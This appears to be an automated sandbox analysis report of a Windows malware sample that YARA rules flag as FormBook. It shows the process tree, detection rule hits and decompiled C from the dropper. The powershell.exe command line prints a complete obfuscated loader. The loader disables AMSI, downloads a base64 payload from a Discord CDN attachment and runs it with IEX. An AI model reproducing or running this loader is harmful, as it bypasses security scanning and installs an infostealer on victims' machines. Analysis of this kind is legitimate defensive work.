                                        Analysis Process: s2rsXUiUn8.exe PID: 4440 Parent PID: 5540

                                        General

                                        Start time:17:59:22
                                        Start date:22/07/2021
                                        Path:C:\Users\user\Desktop\s2rsXUiUn8.exe
                                        Wow64 process (32bit):false
                                        Commandline:'C:\Users\user\Desktop\s2rsXUiUn8.exe'
                                        Imagebase:0x400000
                                        File size:26624 bytes
                                        MD5 hash:F5041EC4CE468A07ECBFD076BC0F879B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low

                                        Chronological Activities

                                        Analysis Process: conhost.exe PID: 5436 Parent PID: 4440

                                        General

                                        Start time:17:59:23
                                        Start date:22/07/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7ecfc0000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Chronological Activities

                                        Analysis Process: powershell.exe PID: 5116 Parent PID: 4440

                                        General

                                        Start time:17:59:24
                                        Start date:22/07/2021
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,48,50,65,53,50,65,48,56,49,59,36,65,68,48,48,70,57,70,49,85,67,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,65,68,48,48,70,57,70,49,85,67,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,115,58,47,47,99,100,110,46,100,105,115,99,111,114,100,97,112,112,46,99,111,109,47,97,116,116,97,99,104,109,101,110,116,115,47,56,53,56,55,57,51,51,50,50,48,56,55,55,49,48,55,53,51,47,56,54,51,56,57,49,56,53,55,54,48,56,48,49,53,57,48,50,47,111,97,100,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,65,68,48,48,70,57,70,49,85,67,46,115,101,110,100,40,41,59,36,54,55,52,69,49,54,53,67,56,51,61,91,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,39,85,84,70,56,39,46,39,71,101,116,83,116,114,105,110,103,39,40,91,67,111,110,118,101,114,116,93,58,58,39,70,114,111,109,66,97,115,101,54,52,83,116,114,105,110,103,39,40,36,65,68,48,48,70,57,70,49,85,67,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,124,73,96,69,96,88);[System.Text.Encoding]::ASCII.GetString($676544567888888888876545666778)|I`E`X
                                        Imagebase:0x7ff617cb0000
                                        File size:447488 bytes
                                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Reputation:high

                                        Chronological Activities

                                        Analysis Process: calc.exe PID: 5856 Parent PID: 5116

                                        General

                                        Start time:17:59:46
                                        Start date:22/07/2021
                                        Path:C:\Windows\SysWOW64\calc.exe
                                        Wow64 process (32bit):true
                                        Commandline:{path}
                                        Imagebase:0x9a0000
                                        File size:26112 bytes
                                        MD5 hash:0975EE4BD09E87C94861F69E4AA44B7A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:moderate

                                        Chronological Activities

                                        Analysis Process: explorer.exe PID: 3472 Parent PID: 5856

                                        General

                                        Start time:17:59:48
                                        Start date:22/07/2021
                                        Path:C:\Windows\explorer.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\Explorer.EXE
                                        Imagebase:0x7ff693d90000
                                        File size:3933184 bytes
                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:high

                                        Chronological Activities

                                        Analysis Process: help.exe PID: 3552 Parent PID: 3472

                                        General

                                        Start time:18:00:14
                                        Start date:22/07/2021
                                        Path:C:\Windows\SysWOW64\help.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\help.exe
                                        Imagebase:0x1f0000
                                        File size:10240 bytes
                                        MD5 hash:09A715036F14D3632AD03B52D1DA6BFF
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:moderate

                                        Chronological Activities

                                        Analysis Process: cmd.exe PID: 4344 Parent PID: 3552

                                        General

                                        Start time:18:00:18
                                        Start date:22/07/2021
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:/c del 'C:\WINDOWS\syswow64\calc.exe'
                                        Imagebase:0x150000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Chronological Activities

                                        Analysis Process: conhost.exe PID: 3084 Parent PID: 4344

                                        General

                                        Start time:18:00:19
                                        Start date:22/07/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7ecfc0000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Chronological Activities

                                        Disassembly

                                        Code Analysis

                                        Reset < >

                                          Analysis Process: s2rsXUiUn8.exe PID: 4440 Parent PID: 5540 s2rsXUiUn8.exeCOMMON

                                          Executed Functions

                                          Function 00401180, Relevance: 13.7, APIs: 9, Instructions: 198sleepstringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 65%
                                          			E00401180(void* __edi, void* __esp, void* __rbx, void* __rcx, void* __rdi, void* __rsi, intOrPtr __rbp, signed int* __r8, void* __r9, void* __r12, void* __r13, void* __r14, void* __r15) {
				signed short _v116;
				signed char _v120;
				void* _v168;
				void* _t28;
				intOrPtr _t32;
				signed int _t38;
				signed int _t44;
				signed int _t52;
				void* _t55;
				signed int _t57;
				void* _t59;
				intOrPtr _t77;
				intOrPtr* _t78;
				long long _t79;
				intOrPtr* _t80;
				signed long long _t81;
				intOrPtr* _t82;
				signed int* _t84;
				intOrPtr* _t87;
				intOrPtr _t91;
				signed long long _t94;
				signed int* _t106;
				signed long long _t107;
				intOrPtr _t110;
				intOrPtr _t113;
				signed long long _t114;
				signed int* _t121;
				intOrPtr _t122;
				void* _t123;
				void* _t125;
				signed long long _t127;
				void* _t131;
				void* _t132;

				_t132 = __r15;
				_t131 = __r14;
				_t129 = __r13;
				_t123 = __r9;
				_t121 = __r8;
				_t113 = __rbp;
				_push(__r13);
				_push(__r12);
				_push(__rbp);
				_push(__rdi);
				_push(__rsi);
				_push(__rbx);
				memset(__edi, 0, 0xd << 0);
				_t59 = __esp + 0xc;
				_t55 = __edi + 0xd;
				_t106 =  *0x4054a0; // 0x408610
				r9d =  *_t106;
				if(r9d != 0) {
					Sleep();
				}
				_t87 =  *0x4053f0; // 0x408978
				_t110 =  *((intOrPtr*)( *[gs:0x30] + 8));
				_t125 = Sleep;
				while(1) {
					_t77 = _t113;
					asm("lock dec eax");
					if(_t77 == 0) {
						break;
					}
					__eflags = _t110 - _t77;
					if(_t110 == _t77) {
						_t111 =  *0x405400; // 0x408970
						_t57 = 1;
						__eflags =  *_t111 - 1;
						if( *_t111 != 1) {
							L6:
							if( *_t111 == 0) {
								 *_t111 = 1;
								_t91 =  *0x405430; // 0x40a018
								L00402AE8();
							} else {
								 *0x408004 = 1;
							}
							_t24 =  *_t111;
							if( *_t111 == 1) {
								L39:
								_t91 =  *0x405410; // 0x40a000
								L00402AE8();
								__eflags = _t57;
								 *_t111 = 2;
								if(_t57 != 0) {
									goto L10;
								}
								goto L40;
							} else {
								L9:
								if(_t57 == 0) {
									L40:
									_t24 = 0;
									 *_t87 = _t77;
								}
								L10:
								_t78 =  *0x405390; // 0x405080
								_t79 =  *_t78;
								if(_t79 != 0) {
									r8d = 0;
									_t52 = 2;
									_t24 =  *_t79();
								}
								E00401CB0(_t24, _t79, _t87, _t91, _t106, _t111, _t121, _t125, _t129, _t131, _t132);
								Sleep(??); // executed
								 *((long long*)( *0x4053e0)) = _t79;
								_t28 = E00401AB0(E00402B60(E00402110(_t55, _t59, 0, _t79, E00402200,  *0x4053e0), 0x401000));
								_t80 =  *0x4053a0; // 0x400000
								 *0x408968 = _t80;
								E00402B70(_t28);
								_t44 = 0;
								_t81 =  *_t80;
								if(_t81 != 0) {
									while(1) {
										_t52 =  *_t81 & 0x000000ff;
										__eflags = _t52 - 0x20;
										if(_t52 <= 0x20) {
											goto L14;
										}
										r8d = _t44;
										r8d = r8d ^ 0x00000001;
										__eflags = _t52 - 0x22;
										_t44 =  ==  ? r8d : _t44;
										L17:
										_t81 = _t81 + 1;
										__eflags = _t81;
										continue;
										L14:
										__eflags = _t52;
										if(_t52 == 0) {
											L20:
											__eflags = _t52;
											if(_t52 != 0) {
												while(1) {
													_t81 = _t81 + 1;
													_t52 =  *_t81 & 0x000000ff;
													__eflags = _t52;
													if(_t52 == 0) {
														break;
													}
													__eflags = _t52 - 0x20;
													if(_t52 > 0x20) {
														break;
													}
												}
												L24:
												 *0x408960 = _t81;
												goto L25;
											}
											goto L24;
										}
										__eflags = _t44 & 0x00000001;
										if((_t44 & 0x00000001) == 0) {
											goto L20;
										}
										_t44 = 1;
										goto L17;
									}
								} else {
									L25:
									r8d =  *_t106;
									if(r8d != 0) {
										_t38 = 0xa;
										if((_v120 & 0x00000001) != 0) {
											_t38 = _v116 & 0x0000ffff;
										}
										 *0x403000 = _t38;
									}
									r12d = _t87 + 1;
									_t127 = r12d << 3;
									_t94 = _t127;
									malloc(??);
									_t107 =  *0x408018;
									_t114 = _t81;
									if( *0x408020 <= 0) {
										L32:
										 *_t81 = 0;
										 *0x408018 = _t114;
										E00401670(_t52, _t81, _t121);
										_t82 =  *0x4053b0; // 0x4092e0
										 *((long long*)( *_t82)) =  *0x408010;
										_t122 =  *0x408010;
										_t32 = E00401550( *0x408020, _t52,  *_t82, _t94,  *0x408018); // executed
										 *0x40800c = _t32;
										if( *0x408008 == 0) {
											L00402AC8(); // executed
											asm("o16 nop [cs:eax+eax]");
											_t84 =  *0x4054a0; // 0x408610
											 *_t84 = 1;
											E004016B0(_t87, _t107, _t111, _t127);
											return E00401180(_t55, _t59, _t87, _t94, _t107, _t111, _t114, _t122, _t123, _t127, _t129, _t131, _t132);
										} else {
											if( *0x408004 == 0) {
												L00402AF0();
												_t32 =  *0x40800c;
											}
											return _t32;
										}
									} else {
										_t129 = 8 + _t81 * 8;
										do {
											strlen();
											_t13 = _t81 + 1; // 0x1
											_t111 = _t13;
											malloc(??);
											_t121 = _t13;
											 *(_t114 + _t87) = _t81;
											_t94 = _t81;
											_t87 = _t87 + 8;
											memcpy(??, ??, ??);
										} while (_t129 != _t87);
										_t17 = _t127 - 8; // -8
										_t81 = _t114 + _t17;
										goto L32;
									}
								}
							}
						}
						L38:
						L00402AF8();
						_t24 =  *_t111;
						__eflags =  *_t111 - 1;
						if( *_t111 != 1) {
							goto L9;
						}
						goto L39;
					}
					Sleep();
				}
				_t111 =  *0x405400; // 0x408970
				_t57 = 0;
				if( *_t111 == 1) {
					goto L38;
				}
				goto L6;
			}




































                                          0x00401180
                                          0x00401180
                                          0x00401180
                                          0x00401180
                                          0x00401180
                                          0x00401180
                                          0x00401180
                                          0x00401182
                                          0x00401184
                                          0x00401185
                                          0x00401186
                                          0x00401187
                                          0x0040119e
                                          0x0040119e
                                          0x0040119e
                                          0x004011a1
                                          0x004011a8
                                          0x004011ae
                                          0x00401473
                                          0x00401473
                                          0x004011bd
                                          0x004011c6
                                          0x004011ca
                                          0x004011e4
                                          0x004011e4
                                          0x004011e7
                                          0x004011ef
                                          0x00000000
                                          0x00000000
                                          0x004011d3
                                          0x004011d6
                                          0x00401410
                                          0x00401417
                                          0x0040141e
                                          0x00401421
                                          0x00401205
                                          0x00401209
                                          0x00401487
                                          0x0040148d
                                          0x00401494
                                          0x0040120f
                                          0x0040120f
                                          0x0040120f
                                          0x00401219
                                          0x0040121e
                                          0x0040143c
                                          0x00401443
                                          0x0040144a
                                          0x0040144f
                                          0x00401451
                                          0x00401457
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00401224
                                          0x00401224
                                          0x00401226
                                          0x0040145d
                                          0x0040145d
                                          0x0040145f
                                          0x0040145f
                                          0x0040122c
                                          0x0040122c
                                          0x00401233
                                          0x00401239
                                          0x0040123b
                                          0x0040123e
                                          0x00401245
                                          0x00401245
                                          0x00401247
                                          0x00401253
                                          0x00401260
                                          0x00401274
                                          0x00401279
                                          0x00401280
                                          0x00401287
                                          0x0040128c
                                          0x0040128e
                                          0x00401294
                                          0x004012b2
                                          0x004012b2
                                          0x004012b5
                                          0x004012b8
                                          0x00000000
                                          0x00000000
                                          0x004012ba
                                          0x004012bd
                                          0x004012c1
                                          0x004012c4
                                          0x004012ae
                                          0x004012ae
                                          0x004012ae
                                          0x00000000
                                          0x004012a0
                                          0x004012a0
                                          0x004012a2
                                          0x004012d0
                                          0x004012d0
                                          0x004012d2
                                          0x004012e5
                                          0x004012e5
                                          0x004012e9
                                          0x004012ec
                                          0x004012ee
                                          0x00000000
                                          0x00000000
                                          0x004012e0
                                          0x004012e3
                                          0x00000000
                                          0x00000000
                                          0x004012e3
                                          0x004012f0
                                          0x004012f0
                                          0x00000000
                                          0x004012f0
                                          0x00000000
                                          0x004012d4
                                          0x004012a4
                                          0x004012a7
                                          0x00000000
                                          0x00000000
                                          0x004012a9
                                          0x00000000
                                          0x004012a9
                                          0x00401296
                                          0x004012f7
                                          0x004012f7
                                          0x004012fd
                                          0x00401304
                                          0x00401309
                                          0x00401400
                                          0x00401400
                                          0x0040130f
                                          0x0040130f
                                          0x0040131b
                                          0x00401322
                                          0x00401326
                                          0x00401329
                                          0x00401330
                                          0x00401337
                                          0x0040133a
                                          0x00401387
                                          0x00401387
                                          0x0040138e
                                          0x00401395
                                          0x0040139a
                                          0x004013b1
                                          0x004013b4
                                          0x004013c2
                                          0x004013cd
                                          0x004013d5
                                          0x004014a0
                                          0x004014a6
                                          0x004014b4
                                          0x004014bb
                                          0x004014c1
                                          0x004014d1
                                          0x004013db
                                          0x004013e3
                                          0x004013e5
                                          0x004013ea
                                          0x004013ea
                                          0x004013ff
                                          0x004013ff
                                          0x0040133c
                                          0x00401341
                                          0x00401350
                                          0x00401354
                                          0x00401359
                                          0x00401359
                                          0x00401360
                                          0x00401365
                                          0x00401368
                                          0x00401371
                                          0x00401374
                                          0x00401378
                                          0x0040137d
                                          0x00401382
                                          0x00401382
                                          0x00000000
                                          0x00401382
                                          0x0040133a
                                          0x00401294
                                          0x0040121e
                                          0x00401427
                                          0x0040142c
                                          0x00401431
                                          0x00401433
                                          0x00401436
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00401436
                                          0x004011e1
                                          0x004011e1
                                          0x004011f1
                                          0x004011f8
                                          0x004011ff
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.228347104.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.228341440.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228352803.0000000000404000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228359069.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228364492.000000000040C000.00000020.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228368923.000000000040D000.00000080.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Sleep$malloc$_cexitmemcpystrlen
                                          • String ID:
                                          • API String ID: 1179148840-0
                                          • Opcode ID: f6bbd7e5a4c7a21daf7a8cc5ade2256f950aefc4e272dfeb92632f9150223466
                                          • Instruction ID: b7c28a9b3e98e3de3c43cc79ddbd6e804bb1bcbbec0da6fc7c11445f14dfeeec
                                          • Opcode Fuzzy Hash: f6bbd7e5a4c7a21daf7a8cc5ade2256f950aefc4e272dfeb92632f9150223466
                                          • Instruction Fuzzy Hash: 54815B71700A4486EB249F56E99576A33A1F745B88F84803EEF49B73A1DF7DC845CB08
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401550, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetConsoleWindow.KERNELBASE(?,?,?,?,00000000,004013C7), ref: 0040156B
                                          • WinExec.KERNEL32(?,?,?,?,00000000,004013C7), ref: 004015AE
                                          Strings
                                          • Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB8, xrefs: 004015A0
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.228347104.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.228341440.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228352803.0000000000404000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228359069.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228364492.000000000040C000.00000020.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228368923.000000000040D000.00000080.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ConsoleExecWindow
                                          • String ID: Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB8
                                          • API String ID: 1085600294-310446022
                                          • Opcode ID: c3d81975171583744080927cabbc9c5061029ccc8b650524a3ba009f7d9378d5
                                          • Instruction ID: a41cb216d4b8fa10c4f5b73b6c51b3a1e76dfabc5dbbd7e954b10e705bf95156
                                          • Opcode Fuzzy Hash: c3d81975171583744080927cabbc9c5061029ccc8b650524a3ba009f7d9378d5
                                          • Instruction Fuzzy Hash: 8DF01CA5720B049DEB449B66FC803593364F388B84F5404659F1CA77B5DE39CA51C744
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 00401CB0, Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 283sleepCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 70%
                                          			E00401CB0(signed int __eax, signed long long __rax, void* __rbx, signed short* __rcx, void* __rdi, void* __rsi, signed long long __r8, void* __r12, void* __r13, void* __r14, void* __r15) {
				signed int _t30;
				signed int _t33;
				intOrPtr _t37;
				signed int _t41;
				signed int _t53;
				signed int _t68;
				signed int _t78;
				void* _t81;
				void* _t82;
				signed long long _t85;
				intOrPtr* _t91;
				signed short* _t96;
				intOrPtr* _t98;
				signed long long _t100;
				signed long long _t109;
				signed int _t114;
				void* _t117;
				void* _t119;
				void* _t120;
				signed long long _t129;
				intOrPtr _t134;
				intOrPtr _t141;
				void* _t146;
				intOrPtr _t150;
				intOrPtr _t151;
				signed int _t154;
				signed long long _t155;

				_t156 = __r15;
				_t129 = __r8;
				_t96 = __rcx;
				_t94 = __rbx;
				_t85 = __rax;
				_t30 = __eax;
				_push(__r15);
				_push(__rbx);
				_t120 = _t119 - 0x38;
				_t117 = _t120 + 0x80;
				_t53 =  *0x408620;
				if(_t53 == 0) {
					 *0x408620 = 1;
					E00402800();
					_t30 = E00402A40(_t85);
					_t141 =  *0x405370; // 0x405530
					 *0x408624 = 0;
					_t114 =  *0x405380; // 0x405530
					 *0x408628 = _t120 - (0x0000001e + (_t85 + _t85 * 0x00000004) * 0x00000008 & 0xfffffff0) + 0x20;
					_t91 = _t141 - _t114;
					__eflags = _t91 - 7;
					if(_t91 <= 7) {
						goto L1;
					} else {
						__eflags = _t91 - 0xb;
						_t68 =  *_t114;
						if(_t91 <= 0xb) {
							L18:
							__eflags = _t68;
							if(_t68 != 0) {
								goto L5;
							} else {
								_t20 = _t114 + 4; // 0x302e312e3820
								_t30 =  *_t20;
								__eflags = _t30;
								if(_t30 != 0) {
									goto L5;
								} else {
									goto L20;
								}
							}
						} else {
							__eflags = _t68;
							if(_t68 == 0) {
								_t17 = _t114 + 4; // 0x0
								__eflags =  *_t17;
								if( *_t17 != 0) {
									goto L5;
								} else {
									_t18 = _t114 + 8; // 0x0
									__eflags =  *_t18;
									if( *_t18 != 0) {
										L20:
										_t21 = _t114 + 8; // 0x302e
										__eflags =  *_t21 - 1;
										if(__eflags != 0) {
											L34:
											_t98 = "  Unknown pseudo relocation protocol version %d.\n";
											E00402C80(__eflags, _t94, _t98, _t100, _t114, _t129, _t134);
											_t37 =  *_t98;
											__eflags = _t37 - 0xc0000091;
											if(_t37 > 0xc0000091) {
												__eflags = _t37 - 0xc0000094;
												if(__eflags == 0) {
													L00402A98();
													__eflags = _t91 - 1;
													if(_t91 != 1) {
														goto L49;
													} else {
														L00402A98();
														_t41 = 0;
														goto L43;
													}
												} else {
													if(__eflags > 0) {
														__eflags = _t37 - 0xc0000095;
														if(_t37 == 0xc0000095) {
															goto L60;
														} else {
															__eflags = _t37 - 0xc0000096;
															if(_t37 != 0xc0000096) {
																goto L58;
															} else {
																goto L53;
															}
														}
													} else {
														__eflags = _t37 - 0xc0000092;
														if(_t37 == 0xc0000092) {
															goto L60;
														} else {
															__eflags = _t37 - 0xc0000093;
															if(_t37 != 0xc0000093) {
																goto L58;
															} else {
																goto L48;
															}
														}
													}
												}
											} else {
												__eflags = _t37 - 0xc000008d;
												if(_t37 >= 0xc000008d) {
													L48:
													L00402A98();
													__eflags = _t91 - 1;
													if(_t91 == 1) {
														L00402A98();
														E00401AB0(_t37);
														goto L60;
